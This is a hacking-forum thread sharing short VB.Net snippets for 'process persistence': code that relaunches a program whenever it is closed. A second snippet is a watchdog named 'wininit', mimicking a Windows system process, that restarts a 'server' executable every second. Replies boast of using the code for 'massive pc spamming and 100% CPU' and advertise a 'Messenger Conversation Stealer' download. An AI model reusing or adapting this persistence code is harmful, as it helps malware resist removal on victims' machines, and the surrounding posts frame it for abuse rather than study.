Login Register






[VB.Net] Basic Process Persistence filter_list
Author
Message
[VB.Net] Basic Process Persistence #1
Code:
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick If Process.GetProcessesByName(Process.GetCurrentProcess.ProcessName).Length < 2 Then 'If self is Opened Less than twice Process.Start(Process.GetCurrentProcess.ProcessName) 'Start own instance End If End Sub

Spoiler: How to defeat this persistence?
Using Windows Task Manager, click End Tree
[Image: rytwG00.png]
Redcat Revolution!

Reply

RE: [VB.Net] Basic Process Persistence #2
hehe i love this code :wub:

used it in my l3et@ for massive pc spamming and 100% CPU Evil
Pierce the life fibers with your drill.

Reply

RE: [VB.Net] Basic Process Persistence #3
This is just another way

Code:
Public Class wininit Shared Sub Main() Dim d = New List(Of String)() While True Try For Each p As System.Diagnostics.Process In System.Diagnostics.Process.GetProcesses() d.Add(p.ProcessName) Next If Not d.Contains("name of the server") Then System.Diagnostics.Process.Start(server path & "\name of the server.exe") End If d.Clear() Thread.Sleep(1000) Catch End Try End While End Sub End Class
(This post was last modified: 05-04-2011, 07:11 AM by BreakR.)

Reply

RE: [VB.Net] Basic Process Persistence #4
Coder san great share man as usual Tongue
[hide][link=http://adf.ly/1mQjP ]Messenger Conversation Stealer[/link][/hide][hide][link=http://adf.ly/1mQpA ](Video on how it work)[/link][/hide]

Reply